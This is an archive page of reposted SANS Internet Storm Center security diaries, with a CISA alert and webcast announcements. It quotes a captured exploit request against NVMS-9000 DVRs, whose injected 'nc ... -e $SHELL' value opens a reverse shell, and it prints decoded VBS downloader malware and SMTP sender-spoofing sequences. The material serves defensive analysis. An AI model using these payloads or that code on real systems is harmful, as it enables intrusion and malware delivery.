Tag Archives: Security

Scanning Activity for NVMS-9000 Digital Video Recorder, (Sun, Oct 20th)

This post was originally published on this site

Since the beginning of October, my honeypot has been capturing numerous scans for DVR model NVMS-9000 which a PoC was released last year describing a “Stack Overflow in Base64 Authorization”[1].

DVR Activity NVMS-9000

The traffic captured by my honeypot matches the PoC with the same Base 64 username and password (admin:{12213BD1-69C7-4862-843D-260500D1DA40}) attempting to fork a reverse shell to redirect the traffic to a remote listener on port TCP 31337. The vendor advisory is posted here where they indicated a firmware update is available.

Here is an example of traffic you could expect to see in your logs:

20191020-025738: 192.168.25.9:80-84.150.176.93:34656 data ‘POST /editBlackAndWhiteList HTTP/1.1rnAccept-Encoding: identityrnContent-Length: 586rnAccept-Language: en-usrnHost: XX.71.48.119rnAccept: */*rnUser-Agent: ApiToolrnConnection: closernCache-Control: max-age=0rnContent-Type: text/xmlrnAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=rnrn<?xml version=”1.0″ encoding=”utf-8″?><request version=”1.0″ systemType=”NVMS-9000” clientType=”WEB”><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=”filterTypeMode”>refuse</filterType><filterList type=”list”><itemType><addressType type=”addressType”/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}XX.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>’

[1] https://raw.githubusercontent.com/mcw0/PoC/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
[2] http://en.tvt.net.cn/news/227.html
[3] https://manualzz.com/doc/9541049/cms-nvms-9000-presentation

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

What Assumptions Are You Making?, (Sat, Oct 19th)

This post was originally published on this site

If my security agents were not working correctly, then I would get an alert. Since no one said there is a problem with my security agents, then everything must be ok with them. These are just a couple of the assumptions that we make as cybersecurity practitioners each day about the security agents that serve to protect our respective organizations. While it is preferable to think that everything is ok, it is much better to validate that assumption regularly. 

I have been fortunate to work in cybersecurity for many years and at several diverse types of organizations. During that time, I always found it helpful to check on the status of the security agents periodically. I have found that by scheduling regular and recurring calendar reminders, I can better validate the assumption that the security agents are working as intended. Specific areas of focus include both confirming the security agent is installed correctly and that it is performing the actions specified in the policy. 

Central monitoring consoles are a great place to start for security agents that have not communicated back to the console within an acceptable time. The output from the console can be compared to the Inventory and Control of Hardware Assets to ensure that every system has a security agent installed. Whether an automated or manual task, this practical step can help to validate that assumption. 

What assumptions can you validate today? Think about that over the weekend and determine to take action on Monday morning! By being intentional to validate the health of your security agents, you can do a great deal to validate the assumptions you are making.

How to a how long can you stand not to know when your security agents are not working as expected? Let us know of your successes in the comments section below!

 

Russell Eubanks

ISC Handler

@russelleubanks

10 Visibility Gaps Every CISO Must Fill

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Special Webcast: SANS Cloud Security Operations Solutions Forum – October 18, 2019 8:30am US/Pacific

This post was originally published on this site

Speakers: Kenneth Hartman

{{!In the Seattle area? Join us at the Live Event. Register here: Link}}

All organizations must protect their confidential information. After all, it is this information that gives the organization its competitive value and enables it to achieve its mission. Security operations (SecOps) is focused on the day-to-day tasks necessary to protect the confidentiality, integrity, and availability of the organization’s data and the systems that process it. Moving this data to the cloud certainly brings creates some SecOps challenges. What works on-premise may not work effectively in the cloud and might not scale well.

Concerns about the trustworthiness of the cloud are the most significant barrier to cloud adoption. Knowing these apprehensions, Cloud Service Providers (CSP) and other solution providers are tackling this challenge head-on and have created innovative solutions to help cloud customers secure the data they process in the cloud. Cloud-native technical security controls that leverage application programming interfaces (API) and the software-defined aspects of cloud services enable customers to lock down their environments in ways that are not possible on-premise. These capabilities have caused some to argue that a properly configured cloud environment may be more secure.

The challenge with so much innovation and so many choices is that customers can get overwhelmed with all the hype in the marketplace. The SANS Cloud Security Operations Solutions Forum will focus on cloud security operations solutions that work, with a focus on providing specific technical advice directly from the vendor support engineers working in the field.

Earn 4 CPE Credit hours for attending this event.

Agenda: TBD

Speakers:

Kenneth Hartman

Kenneth G. Hartman is a security engineering leader in Silicon Valley. Ken’s motto is “I help my company earn and maintain the trust of our customers in our products and services.” Toward this end, Ken drives a comprehensive program portfolio of technical security initiatives focused on securing customers’ data in the AWS Cloud. Ken has worked for a variety of Cloud Service Providers in Architecture, Engineering, Compliance, and Security Product Management roles. From 2002-2011, Ken helped launch and lead a company called Visonex into a profitable, nation-wide dialysis-specific electronic medical record using a software-as-a-service (SaaS) business model. Ken holds a BS Electrical Engineering from Michigan Technological University and a Masters Degree in Information Security Engineering from SANS Technology Institute. Ken has earned the CISSP, as well as multiple GIAC security certifications, including the GIAC Security Expert. Ken is also a Licensed PI in Michigan as required by law to consult on criminal cases involving digital forensics.

Quick Malicious VBS Analysis, (Fri, Oct 18th)

This post was originally published on this site

Let’s have a look at a VBS sample found yesterday. It started as usual with a phishing email that contained a link to a malicious ZIP archive. This technique is more and more common to deliver the first stage via a URL because it reduces the risk to have the first file blocked by classic security controls. The link was:

hxxp://weddingcardexpress[.]com/ext/modules/payment/moneybookers/logos/docs/8209039094.zip

The downloaded file is saved as JVC_53668.zip (SHA256: 9bf040f912fce08fd5b05dcff9ee31d05ade531eb932c767a5a532cc2643ea61) has a VT score of 1/56[1].

The archive contains a VBS script called JVC_53668.vbs (SHA256:f894030285d5a577bf970692c2e7096137460802348ee71b5198497c2d603ce1) and unknown on VT at the redaction time of this diary. What looks strange in the size of the file: 3.8MB! The file is indeed heavily poluted with many very long comment lines. Once cleaned up, the size is reduced to 159KB. Having a big file is also interesting for an attacker because some security controls do not scan or process files above a certain size for performance reasons.

The code is also obfuscated via many mathematical expressions:

ddvA = Mid(otQh, 451 - 386 + 2 - 303 + 24 - 12 + 19 - 14 + 21 + 433 - 230, 281 + 212 - 325 + 4 + 444 - 10 - 153 - 19 - 482 - 158 - 466 + 11 + 12 - 433 + 1084)
jqCe = 471 - 23 + 245 - 274 - 285 - 2 + 391 + 21 + 25 - 16 - 15 + 4 - 434 + 13 + 578
isW = CInt(ddvA)
tztf = 162 + 19 - 277 - 3 + 22 - 16 + 235 - 7 + 5 - 2 - 7 + 438 + 11 - 24 - 445 + 527
uox = FQE and tztf
wMs = Asc(Mid(InP, isW, 216 - 437 - 21 + 427 + 20 - 226 - 122 - 21 - 315 - 15 - 119 + 333 + 281))
CBTl = 411 - 142 - 131 + 8 - 12 - 11 + 13 + 25 + 13 - 397 - 7 + 9 + 960
KWZM = Sqr(amYG)
ddvA = Mid(otQh, 327 + 165 + 11 - 376 - 486 + 14 + 152 + 438 - 475 - 466 - 22 + 494 - 2 - 112 - 24 - 310 + 678, 194 + 119 - 151 - 351 + 14 + 14 + 328 + 9 + 466 + 6 - 286 + 150 - 510)
Pts = 317 + 11 + 23 + 13 - 359 + 159 + 23 - 4 - 311 - 9 + 659

But, it’s not difficult to spot the most interesting part of the code. There is the following line is present close to the file end:

eXEcUTegLObAL kpYE

ExecuteGlobal[2] is used in VBS like IEX in PowerShell. The code passed as an argument will be executed in the context of the script. Let’s have a look at the ‘kpYE’ variable:

kpYE = UkX(zANa, PChk)

UkX() is the only function present in the script. Here is a beautified version:

function UkX(VSqz, kdH)
    On Error Resume Next
    MRgD = VSqz
    Pts = Xear * cTln
    qaux = LoKu - jqCe
    XqIc = DJlE * LoKu
    whhI = ""
    Xear = AYwV and qaux
    jqCe = Sgn(Pts)
    OaT = ""
    vDI = 480 + 319 + 4 + 19 - 285 + 327 - 25 + 109 + 453 + 11 - 22 + 2 - 306 - 478
    FBD = 279 + 260 + 202 + 270 + 399 - 348 - 173 + 20 + 14 - 922
    JNHe = 377 + 9 + 309 + 351 - 152 - 12 - 9 - 289 + 111
    Xear = 159 + 6 - 14 + 18 - 249 + 392 - 191 - 25 - 20 + 454 - 7 + 468 + 333 + 335 - 21 - 926
    for i=215 + 193 - 4 - 394 + 111 + 3 + 364 - 24 + 15 - 25 + 272 - 12 + 19 - 129 - 328 - 275 to len(MRgD)
        KWZM = 348 - 9 - 463 - 16 - 305 + 154 - 255 + 493 + 240 + 441 - 8 - 23 - 116 + 132 + 22 - 41
        gmJg = cTln + DJlE
        if ( asc(mid(MRgD, i, 481 - 10 + 154 + 103 - 469 - 19 - 433 - 13 + 207)) > 276 - 269 - 21 - 4 + 497 - 383 - 163 + 330 + 352 - 568 and asc(mid(MRgD, i, 417 - 3 - 445 + 498 + 4 + 20 + 215 + 489 + 7 + 14 - 1215)) < 130 + 15 + 144 - 4 + 10 + 109 - 364 - 380 + 398 ) then
            qaux = gmJg and XqIc
            AYwV = 410 - 115 - 273 - 129 + 499 - 3 + 150 + 2 - 32
            whhI = whhI + mid(MRgD, i, 302 - 223 + 112 - 372 + 25 - 345 - 11 - 202 + 715)
            JNHe = JNHe and tztf
            FBD = 452 + 8 - 21 - 23 - 156 - 24 + 10 - 375 + 130
            LoKu = 240 + 492 - 11 - 482 + 391 + 15 - 451 - 2 - 7 + 21 + 475
            AYwV = vDI / tztf
            FQE = EkB and tztf
        else
            AYwV = Log(EkB)
            Pts = Exp(CBTl)
            fEt = Exp(cTln)
            if FBD = 391 + 340 + 7 + 106 - 413 - 256 + 13 + 18 + 226 - 7 - 18 - 430 + 203 + 19 - 119 - 79 then
                fEt = 482 + 11 + 7 - 17 - 188 + 18 + 3 - 500 + 443 - 10 + 223 - 363 + 391 + 440 - 7 - 179 - 106
                LoKu = 160 - 147 - 335 - 167 - 21 + 21 - 6 + 2 - 342 + 1458
                FQE = gmJg + mpuU
                xba = CInt(whhI)
                UIh = xba xor kdH
                OaT = OaT + Chr(UIh)
                AYwV = 165 - 18 + 366 - 15 - 16 + 17 - 19 + 9 - 4 + 17 + 14 + 379 - 17 - 425 + 201
            end if
            vDI = 363 - 385 + 188 + 182 + 425 - 11 - 144 - 269 + 187 + 14 + 95
            LoKu = AYwV - Xear
            whhI = ""
            tztf = XqIc + gmJg
            HMTs = 240 - 11 + 304 + 382 + 299 + 195 - 10 + 395 + 12 + 20 + 11 - 2 - 186 - 215 + 373 - 151 - 940
            LoKu = Pts * KWZM
            FBD = 491 - 24 + 8 - 440 - 20 + 16 - 21 - 12 - 13 + 383 - 368
            FQE = CBTl / JNHe
            KWZM = EkB and mpuU
        end if
        CBTl = EkB * tztf
    next
    UkX = OaT
    uox = mpuU or DJlE
    qaux = 334 - 25 + 15 + 372 + 388 - 25 + 10 - 17 - 101 - 353 + 248 + 469 - 11 - 733
    jqCe = 355 + 8 - 2 - 12 + 12 - 24 - 20 + 116 + 245
end function

The variable ‘zANa’ is a very long string:

zANa = "113X113Cv{fR100.    Q49Z$52?107Mo$|53)CgT113    PTx112!%aD{b21Cc<rRu49Bd}UD27aQ30{Wz!36-v122}zaq125v6,(c*7Z:nyFV115zGb:M114/*BE53xLm126MI!D122od22d25K-    *k34&?&W110XE122^uf112v+!l45lN;32yZc&S121;51<YmW-14P11o&CQE.110q:&:e10)u<SXV107QdP 121/112^Op}<Z17qXhP<62nuI37v~u$L113@Mv113rb[50)xWKZr8vqfYjy102e29o(T^V{119D113)bbQ}113< n@v 49X=Q59_!|121rh K122MD 121XK13d^V}47Ny*61tEcb49*124q!:120[(Dodk1.%XFH:96y,L~Rg15<l{24,h 121p112mE38p24Y^)_wj1VHw38?22n!ii 121 127=oV]SP65Z121;ViE125(50$)R27C+?60}Y7ogC45s14|=121w@122t125}    b36TKlZ24S^e*P45v    V^121=120l123k;twd101EM16d121f     B|    120Qr=fNI120s:#cX36;:    41~j65T!$Oh33([121Mt120d*rOQ123d27)hlf^0#*53f[%$s43p44zo*108hJM121Jh125    :x}[!46]/_$123pp[P~126~Iqxn51 .R!g113+126&K*-E39S]d  
...
..."   

As a security analyst, when I have to dive into malicious code, my goal is to understand as fast as possible if the code is malicious (most of the time, it is) but also what are the next actions and how to extract useful information to share with other teams to protect the organization (ex: sharing IOC’s)

I don’t have to spend time to understand how the function UkX() works. Just by having a look at the arguments, we can guess that it just decodes a string (arg1) with a key (arg2). Let’s execute the script in a sandbox but replace the ExecuteGlobal() function with WScript.Echo() to print the decoded content:

Here is the code for better readability:

on error resume next
arr=split(KPH,"___")
set a=WScript.CreateObject(arr(0))
set b=WScript.CreateObject(arr(1))
f=a.ExpandEnvironmentStrings(arr(2))&arr(3)
set c=a.CreateShortcut(f)
c.TargetPath=arr(4)
c.Save
if b.FileExists(f)=false Then
    e=a.ExpandEnvironmentStrings(arr(2))&arr(5)
    Call u
    sub u
        set d=createobject(arr(6))
        set w=createobject(arr(7))
        d.Open arr(8),arr(9),False
        d.setRequestHeader arr(10),arr(11)
        d.Send
        with w
            .type=1
            .open
            .write d.responseBody
            .savetofile e,2
        end with
    end sub
    WScript.Sleep 60000
    a.Exec(e)
end if

This code uses an array (arr) that is created via a call to split() at the beginning. Let’s apply the same technique and re-execute the script with a “Wscript.echo KPH”:

The decoded & split array is:

WScript.Shell
Scripting.FileSystemObject
%TEMP%
x.url
an
VideoBoost.exe
MSXML2.ServerXMLHTTP.6.0
Adodb.Stream
GET
hxxp://baytk-ksa[.]com/devenv/vendor/laravelcollective/html/src/qrz/asgdyasgfyfdd.png?bg=spx24
User-Agent
lex

We understand now that the second stage is downloaded from the above URL and dumped on disk as “VideoBoost.exe”. The PE file (SHA256:c91c4c5b3452147ae2dcd20c1fa33efe2c1f393443915b88cdcbd67909c46062) received a score of 7/70 on VT[3].

[1] https://www.virustotal.com/gui/file/9bf040f912fce08fd5b05dcff9ee31d05ade531eb932c767a5a532cc2643ea61/detection
[2] https://ss64.com/vb/execute.html
[3] https://www.virustotal.com/gui/file/c91c4c5b3452147ae2dcd20c1fa33efe2c1f393443915b88cdcbd67909c46062/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA19-290A: Microsoft Ending Support for Windows 7 and Windows Server 2008 R2

This post was originally published on this site

Original release date: October 17, 2019

Summary

On January 14, 2020, Microsoft will end extended support for their Windows 7 and Windows Server 2008 R2 operating systems.[1] After this date, these products will no longer receive free technical support, or software and security updates.

Organizations that have regulatory obligations may find that they are unable to satisfy compliance requirements while running Windows 7 and Windows Server 2008 R2.

Technical Details

All software products have a lifecycle. “End of support” refers to the date when the software vendor will no longer provide automatic fixes, updates, or online technical assistance. [2]

For more information on end of support for Microsoft products see the Microsoft End of Support FAQ.

Systems running Windows 7 and Windows Server 2008 R2 will continue to work at their current capacity even after support ends on January 14, 2020. However, using unsupported software may increase the likelihood of malware and other security threats. Mission and business functions supported by systems running Windows 7 and Windows Server 2008 R2 could experience negative consequences resulting from unpatched vulnerabilities and software bugs. These negative consequences could include the loss of confidentiality, integrity, and availability of data, system resources, and business assets.

Mitigations

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and organizations to:

  • Upgrade to a newer operating system.
  • Identify affected devices to determine breadth of the problem and assess risk of not upgrading. 
  • Establish and execute a plan to systematically migrate to currently supported operating systems or employ a cloud-based service. 
  • Contact the operating system vendor to explore opportunities for fee-for-service maintenance, if unable to upgrade.   

References

Revisions

  • October 17, 2019: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

Phishing e-mail spoofing SPF-enabled domain, (Thu, Oct 17th)

This post was originally published on this site

On Monday, I found what looked like a run-of-the-mill phishing e-mail in my malware quarantine. The “hook” it used was quite a common one – it was a fake DHL delivery notification inserted as an image into the body of the e-mail in an attempt to make user open its attachments.

Phishing body

 

There were two attachments (see hashes bellow). RTF file masquerading as a Word Document (“SHIPPING DOCUMENT..doc”), which tried to exploit the famous %%cve:2017-11882%% vulnerability in Equation Editor used by Microsoft Office[1]. The second was an ACE archive (“INVOICE & AWB..ace”), containing a malicious executable (“mk.exe”). Although the executable was kind of interesting – it was an info stealer using Delphi packer[2] – the phishing turned out to be notable for a different reason. The spoofed sender domain had a Sender Policy Framework (SPF)[3,4] record set.
That, by itself, might not be that surprising – contrary to popular belief, setting a SPF record for a domain doesn’t mean that it will be impossible to use the domain in spoofed e-mail messages. Basically, SPF checks themselves cover only the “MAIL FROM” address (i.e. whether the sending server may send e-mails for the domain used in the “MAIL FROM” address) but don’t deal with contents of a “From” field in the e-mail header. This means that the following spoofing attempt will fail, providing that a SPF record for the “sender.tld” domain is correctly set.

HELO sender.tld
MAIL FROM:<sender@sender.tld>
RCPT TO:<receiver@receiver.tld>
DATA
From: "Sender" <sender@sender.tld>
To: "Receiver" <receiver@receiver.tld>
Date: Thu, 17 October 2019 10:15:00 +0100
Subject: Phishing?

 

However even with SPF record correctly set for the sender.tld domain, the following attempt at spoofing will pass SPF checks if the non-spf-domain.tld doesn’t have such record as well (although that doesn’t mean the spoofed e-mail won’t be blocked by some other security mechanism):

HELO non-spf-domain.tld
MAIL FROM:<sender@non-spf-domain.tld>
RCPT TO:<receiver@receiver.tld>
DATA
From: "Sender" <sender@sender.tld>
To: "Receiver" <receiver@receiver.tld>
Date: Thu, 17 October 2019 10:15:00 +0100
Subject: Phishing?

 

Due to its simplicity and effectiveness (to a user, sender seems to be the address in the “From” header of the message, not the address which was specified in “MAIL FROM”), this technique is often used by phishing authors when they send spoofed e-mail messages.
One could therefore expect that the same technique was used in the case of our e-mail, however this was not the case.

 

The sender appears to be dhlexpress@shipping.com and if we take a look at the headers, we’ll see that the same e-mail was used as the “MAIL FROM” address. We may also discover that although a SPF check took place, it ended in “Neutral” result. This means that the SPF record doesn’t state whether the sending IP is or is not authorized to send e-mails for the domain.

SPF check

To understand the last line of the header and the reason for the result, one only needs to know that SPF enables us to use qualifiers to specify from which hosts should e-mails be accepted/passed (+), from which hosts they should be dropped/failed (-), from which they should be marked as suspicious/softfailed (~) and for which hosts the policy isn’t specified (?). The record for shipping.com which we see above therefore basically specifies that several servers are permitted to send e-mails for the domain and for all others may do so as well. Benefits of such SPF records are disputable at best.
Although it is not too usual to see such records and related phishing e-mails, this was not the first time I’ve come across such a case… And after having a look at the Alexa top 100 domains and finding two cases of SPF records containing “?all” even there, it seems that these are actually more common than one might think.
If you use such a SPF record on any of your domains, consider whether the more traditional “~all” or “-all” really isn’t an option for you.
And if you don’t have SPF set up yet, please do so – it will take you only a minute (all you need to do is create a new DNS TXT record) and although it’s not a silver bullet against phishing, it definitely won’t hurt.

SHIPPING DOCUMENT..doc
MD5 – bc759db68c1f1611745216a4e0431201
SHA1 – 22e77a3ee9acc597500dbda6a82b7bd2d13d50b7

INVOICE & AWB..ace
MD5 – 673e823b66bce777f37377bd4aa07f71
SHA1 – 73f7a10fefa04432b18d9af9d4c774ecca815d5c

mk.exe
MD5 – 3c9aa414308ec74eb24b30875c755241
SHA1 – 06fba1adac357a7d338cc3a9a7eb2c68282d260b

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
[2] https://www.fireeye.com/blog/threat-research/2018/09/increased-use-of-delphi-packer-to-evade-malware-classification.html
[3] https://tools.ietf.org/html/rfc4408
[4] https://tools.ietf.org/html/rfc7208

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Asia-Pacific Series: Power up your Security Operations Centers human capital with the new SEC450 Part 2 – Blue Team FundamentalsFinding and training the right people! – October 16, 2019 11:00pm US/Eastern

This post was originally published on this site

Speakers: John Hubbard

Note: This webcast is free of charge however a SANS portal account is required (see webcast link for details)

SANS Asia-Pacific Webcast Series- Power up your Security Operations Centers human capital with the new SEC450 Part 2 – Blue Team FundamentalsFinding and training the right people!

As cyber attacks continue to grow in prevalence and capability many organizations and MSSPs are looking to bolster their cyber defense capabilities. While technology is an outstanding security enabler, it’s finding the right people and training that can make or break a team. If you have a need to quickly bring new defenders up to speed, this webcast and class is for you! In it, we will cover both technical topics and human factors for cyber defense. Specifically, how to avoid the burnout and retention issues commonly associated with SOC positions and how to cultivate a happy, engaged analyst team! Cyber defense is not easy, therefore building a strong foundation of security operations principles is an absolute requirement for any blue team. Authored by a previous SOC analyst and manager, SEC450 Blue Team Fundamentals was written with this goal in mind. It’s designed to answer the question “What are the most important things for a cyber defense team to understand, and how do you implement them?” Come join SEC450 author John Hubbard for this webinar to learn additional details about this course and the new content it brings to the SANS curriculum!

When MacOS Catalina Comes to Life: The First Few Minutes of Network Traffic From MacOS 10.15., (Mon, Oct 14th)

This post was originally published on this site

This post is continuing a series I started in April about network traffic from Windows 10. When dealing with network traffic, it is always good to know what is normal. As part of this series, I will investigate the first few minutes of network traffic from current operating systems. With macOS 10.15 Catalina just being released, I figured this might be an excellent next operating system to investigate.

Lets first start with some basic fingerprinting. TCP SYN packets from MacOS 10.15 look just like SYN packets from earlier macOS versions:

Flags [SEW], seq 4259408247, win 65535, options [mss 1460,nop,wscale 6,nop,nop,TS val 801728007 ecr 0,sackOK,eol], length 0

macOS is one of a few operating systems using ECN by default. It attempts to use the maximum possible window size, but also offers Window Scaling. Like all modern operating systems, macOS uses PMTUD to avoid fragmentation.

1. Catalina Install

For this experiment, I installed Catalina in a virtual machine. The first connections during the install set the time via Apple’s “time.apple.com” NTP server. Next, the system connected to “albert.apple.com” via HTTPS, Apple’s secure activation server. OCSP is used to verify the certificates. The system also checks if it has internet connectivity via “https://www.apple.com/library/test/success.html” and connects to swscan.apple.com. This server is used to distribute Apple software. The connection uses HTTPS, so it isn’t clear what the installer is looking for, but likely supplemental software. In my case, the system connected 18 times and retrieved about 42 MBytes in total.

Interesting: During the install, the system connected 206 times to gspe21-ssl.ls.apple.com, retrieving about 23 MBytes. The system appears to be associated with Apple’s mapping service (http://gspe21.ls.apple.com/html/attribution.html), but of course, it may have other functions as well.

Other significant connections retrieve language-specific dictionaries. These are the only significant HTTP connections.

2. First Boot

The first boot started out a lot like the install with a connection to time.apple.com. But unlike during the install, which used connections pretty much exclusively to Apple’s own systems, macOS does connect to a few non-Apple networks:

  • apple-finance.query.yahoo.com – Retrieve stock quotes

After starting Safari, a few additional connections popped up to load icons for the start screen:

  • www.yelp.com
  • www.yahoo.com
  • www.weather.com
  • www.tripadvisor.com
  • www.linkedin.com
  • www.facebook.com
  • www.bing.com
  • www.twitter.com

There was a lot of talk about Safari’s connection to Tencent for its “Safe Browsing” feature. Apple stated that only systems in China would connect to Tencent, and I did not observe any connections not in line with Apple’s statement.

Apple uses various CDNs, so the exact IP addresses will vary based on your location. I ran these experiments while in Chicago, IL. 

Links to PCAP data:

install.pcap
firstboot.pcap

This post has also been cross-posted to our newish SEC503 Blog: Show Me The Packets!


Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security Monitoring: At Network or Host Level?, (Wed, Oct 16th)

This post was originally published on this site

Today, to reach a decent security maturity, the keyword remains “visibility”. There is nothing more frustrating than being blind about what’s happening on a network or starting an investigation without any data (logs, events) to process. The question is: how to efficiently keep an eye on what’s happening on your network? There are three key locations to collect data:

  • The perimeter (firewalls, proxies, etc)
  • Hosts (servers, endpoints)
  • The network

Performing log collection at the perimeter sounds the bare minimum for many years but it’s not sufficient (Example: How to detect lateral movement on your LAN?) and everybody agrees to say that the perimeter is gone for years.

You can deploy controls and collect information at the host level with tools like Sysmon[1], OSSEC[2] and many other end-points solutions. The problem is a constant fight between teams in big organizations. System admins are not always happy to deploy more and more agents. It also has a constraint in terms of management, upgrades, costs (license for a commercial product) and how do you handle people who bring their own device?

I’m more and more convinced that network monitoring is a key element today. Just by sniffing the traffic at critical exchange points in the network, you have full visibility and increase capacities to detect suspicious traffic. I’ll give you two practical examples that I faced during the BruCON[3] security conference last week (where I’m involved in the NOC/SOC). Basically, the network is used by untrusted devices and people.

First, we had to track somebody based on a downloaded picture. We knew the timestamp and found corresponding pictures on the filesystem of the server. Based on the hash, we found the TCP flow corresponding to the download and finally the IP address assigned by DHCP, the device name and its MAC address. In less than 15 mins.

In the second example, somebody was testing some exploits on a laptop (an official test, nothing malicious). We were able to detect the call-back to the C2 (Cobalt-Strike). In this situation, you don’t know what’s happening on the end-point but you know that it is for sure compromized.

Even if today more and more traffic is encrypted, it is possible to detect suspicious activity just by having a look at the network flows. When they occur, how often, the size of transferred data, the destination, etc.

What was deployed:

  • Zeek (Bro)
  • Full packet capture
  • Full logging of flows
  • Transparent Proxy
  • DHCP, DNS
  • Extract of interesting files
  • Splunk

Of course, network monitoring can be implemented only on networks that you control. You can’t control devices that travel (like laptops). That’s why, in a perfect world, you need both (network & host controls) but the amount of information that can be collected and analyzed on networks is amazing! If you are interested in this field, I recommend you the FOR572[4] training: “Advanced Network Forensics: Threat Hunting, Analysis, and Incident Response”.

[1] https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
[2] https://ossec.net
[3] https://brucon.org
[4] https://www.sans.org/course/advanced-network-forensics-threat-hunting-incident-response

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Special Webcast: Launching APOLLO – Creating a Simple Tool for Advanced Forensic Analysis – October 15, 2019 3:30pm US/Eastern

This post was originally published on this site

Speakers: Sarah Edwards

Pattern-of-life data can provide a story about how a device and its user interact with each other. A user using their Mac or iPhone may have no idea how intimate of a picture can be extracted from the analytical data on their devices. An extremely creepy and granular picture in many cases. This data can be used in a variety of forensic investigations from criminal matters to device intrusions but may end of being a privacy nightmare if the data were to fall into the wrong hands.

Last Fall I introduced a (very) beta version of my new Apple Pattern of Life Lazy Outputer (APOLLO) tool. Since then Ive had lots of positive feedback and have reconfigured and have added more iOS specific modules. With more mobile support and desktop support coming soon investigators can now get a better view of what a user was doing at any given time (assuming theyre all drink the Apple Koolaid of course!)